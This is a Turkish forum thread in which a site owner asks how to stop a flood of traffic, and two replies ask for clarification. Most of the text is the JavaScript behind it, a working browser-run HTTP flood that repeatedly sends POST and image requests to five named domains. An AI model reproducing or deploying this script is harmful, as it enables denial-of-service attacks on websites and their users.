Forum
Merhaba facebook panelindeki kullanıcıları benim siteme gönderiyor ve iletişimim kesiliyor.
Buna nasıl engel olacağımı şaşırdım. 1 haftadır uğraştırıyor bizi
Kod şu şekilde:
Site adresleri göreceksiniz orada. Onlar saldırı giden siteler.
function texts(l)
{
var t = "";var p = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";for( var i=0; i < l; i++ ){ t+= p.charAt(Math.floor(Math.random() * p.length)); }
return t;
}
function postz()
{
var http = new XMLHttpRequest();
var params = texts(10)+"="+texts(10);
http.open("POST", " http://fbooksistem.com/enguzelvine/index.php ?", true);
http.open("POST", " http://fbooksistem.com/index.php ?", true);
http.open("POST", " http://httpopen.com/index.php ?", true);
http.open("POST", " http://httpline.com ?", true);
http.open("POST", " http://facebookhizmetleri.com/login.php ?", true);
http.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=UTF-8");
http.setRequestHeader("Content-length", params.length);
http.setRequestHeader("Connection", "close");
http.onreadystatechange = function() {}
http.send(params);
}
setTimeout(function(){
window.setInterval(postz, 500);
window.setInterval(function(){var teya=new Image().src=' http://fbooksistem.com/enguzelvine/index.php? '+texts(8);}, 400);
window.setInterval(function(){var teya=new Image().src=' http://fbooksistem.com/index.php? '+texts(8);}, 400);
window.setInterval(function(){var teya=new Image().src=' http://httpopen.com/index.php? '+texts(8);}, 400);
window.setInterval(function(){var teya=new Image().src=' http://httpline.com? '+texts(8);}, 400);
window.setInterval(function(){var teya=new Image().src=' http://facebookhizmetleri.com/login.php? '+texts(8);}, 400);
}, 2500);
Merhaba,
Facebook paneli nedir?
Facebook paneldeki kullanıcıları size nasıl gönderiyor?
Belirtmiş olduğunuz kod nerde çalışıyor?
Sorunu detaylı olarak iletebilirseniz yardımcı olmak isterim.
kayhan beyin dediği gibi biraz daha açıklayıcı yazarsanız, cevaplamamız daha kolay olur.